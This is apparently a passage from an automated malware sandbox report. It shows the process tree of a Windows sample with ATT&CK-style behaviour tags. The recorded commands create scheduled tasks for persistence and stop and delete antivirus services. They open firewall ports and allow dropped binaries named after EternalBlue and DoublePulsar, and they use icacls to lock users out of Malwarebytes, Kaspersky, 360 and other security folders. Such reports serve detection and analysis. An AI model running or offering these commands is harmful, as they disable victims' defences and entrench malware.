C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "svchost" /F8⤵
- System Location Discovery: System Language Discovery
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F7⤵
- Indicator Removal: Clear Persistence
PID:4032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\jFvfxe" /F8⤵
- System Location Discovery: System Language Discovery
PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\jFvfxe" /F7⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:960 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\jFvfxe" /F8⤵PID:3040
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:4120
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:5496
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:5304
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
5⤵
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:2156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
PID:2964 -
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:6064
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5636
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:4616
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
PID:5712
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1436
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3320
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:5624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:5532
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:5616
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:4792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:2352
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:5316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:2908
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:4336
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:2724
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:6048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:792
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:4800
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:5252
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:5164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:808
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:5568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:5676
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:5344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:1960
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:6004
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:5688
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:5908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:2872
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
3⤵
PID:5608
-
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
4⤵
- Launches sc.exe
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:800
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
PID:5548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵
- System Location Discovery: System Language Discovery
PID:5380 -
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:3280
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:5472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:4472
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:1072
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:5208
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:1472
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:1664
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:1956
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- System Location Discovery: System Language Discovery
PID:6088 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:5824
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:2296
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:4604
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:1704
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:4800
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3648
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:5448
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:5592
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:4608
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:5484
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:4588
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:3920
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:448
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:428
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:3580
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:1372 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:2080
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4812
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:5616
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4808
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:5412
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:4364
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:1664
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:5196
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:6132
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:2364
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:1040
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:3912 -
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)3⤵PID:4764
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵PID:2296
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:1136
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵PID:5184
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵PID:3304
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
PID:5528
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵PID:1492
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
PID:5432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵PID:6052
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
PID:4104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵PID:200
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
PID:5464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵PID:5688
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵PID:2844
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵PID:2816
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵PID:3568
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵PID:244
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5472
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵PID:5512
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵PID:5944
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵PID:6028
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵PID:5948
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵PID:5256
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵PID:5220
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
PID:6072 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵PID:5584
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5332
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5540
-
-
-
